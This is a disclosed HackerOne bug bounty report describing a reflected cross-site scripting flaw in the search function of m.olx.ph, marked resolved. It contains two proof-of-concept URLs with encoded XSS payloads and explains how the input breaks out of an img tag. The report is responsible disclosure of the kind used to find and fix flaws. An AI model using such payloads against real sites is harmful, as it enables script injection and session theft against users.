Reflected XSS at m.olx.ph

Disclosed: 2016-10-20 15:35:11 By ak1t4 To olx
Medium
Vulnerability Details
## INTRO The m.olx.ph domain is vulnerable to reflected XSS through the search function. ### EXPLOITABILITY & PoC The following URL contains an XSS vector, which causes an alert box to appear https://m.olx.ph/all-results?q=:%27%3E%3Cimg%20src=/%20onerror=alert%28document.domain%29%3E or https://m.olx.ph/all-results?q=:%27%3E%3CBODY%20ONLOAD=javascript:alert%281%29%3E ### Fix & Mitigation: The escaping sequence is force with q=__:'>__ rendering this html code: <img style="display:none;" alt="" src="https://LOGw305.ati-host.net/hit.xiti?s=524255&amp;stc={&quot;member_id&quot;:&quot;&quot;,&quot;member_category&quot;:&quot;free_user&quot;,&quot;page_name&quot;:&quot;ads_list&quot;,&quot;page_nb&quot;:1,&quot;keyword&quot;:&quot;:" height="1" width="1"> <- escape here closing <img> tag ","user_status":"unlogged_user"}' > <- this is rendered as html, before this we can inject the payloads - *Tested on Mozilla Firefox 45.0.2. (Screenshots attached) Please let me know if more info needed, Best Regards, @ak1t4
Actions
View on HackerOne
Report Stats
  • Report ID: 175410
  • State: Closed
  • Substate: resolved
  • Upvotes: 5
Share this report